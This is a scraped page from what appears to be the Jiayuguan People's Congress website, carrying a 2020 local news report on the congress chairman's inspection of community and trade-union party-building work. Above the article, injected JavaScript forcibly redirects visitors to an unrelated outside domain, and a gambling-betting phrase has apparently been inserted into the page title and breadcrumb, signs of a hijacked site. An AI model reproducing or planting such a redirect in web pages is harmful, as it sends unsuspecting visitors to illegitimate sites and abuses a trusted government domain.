function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新党的建设  >>  工作动态  
王进平调研我市部分单位城市基层党建工作
来源: 嘉峪关日报      日期: 2020-06-23      作者: 李巍      点击数:

王进平调研我市部分单位城市基层党建工作

嘉峪关日报讯(记者李巍)6月22日,市人大常委会党组书记、主任王进平深入雄关街道胜利社区、市总工会,调研城市基层党建工作。市人大常委会秘书长赵大鹏一同调研。

在胜利社区,王进平实地查看了部分居民小区绿化美化措施、环境顽疾清除、私搭乱建整治、老旧小区改造等群众关注的热点问题落实情况,在随后举行的社区党建工作座谈会上,认真听取了居民党员代表的诉求与心声。

王进平对胜利社区以“互联共转”行动为载体,有效落实党建工作的做法予以充分肯定。他指出,抓好城市基层党建工作,不是“听起来好听”的形式化工作,而是要让群众“看得见、摸得着,真正得到实惠”的工作,要以群众的关注点为工作的落脚点,发挥“互联共转”行动作用,由表及里、由浅入深地积极解决问题,真正提升群众幸福感、获得感和安全感,确保党旗在人民群众心中高高飘扬。

在市总工会,王进平现场查看了工人文化宫活动阵地、离退休干部党建室和机关党建室建设情况,听取了党支部建设标准化工作开展情况汇报。

王进平强调,要以党支部建设标准化工作成果为契机,总结经验,深入探索党建工作与企业发展的深度融合,积极探索人大工作和工会工作的融合发展;要在活动方式、作用发挥方面找到结合点,抓牢人大代表和职工代表在履职方式、能力建设中的相同点,确保我市各企业政治建设和业务工作同部署、同推进,全面提升党支部工作质效,实现党建工作促发展的工作目标,推动党建工作有新进展、上新台阶。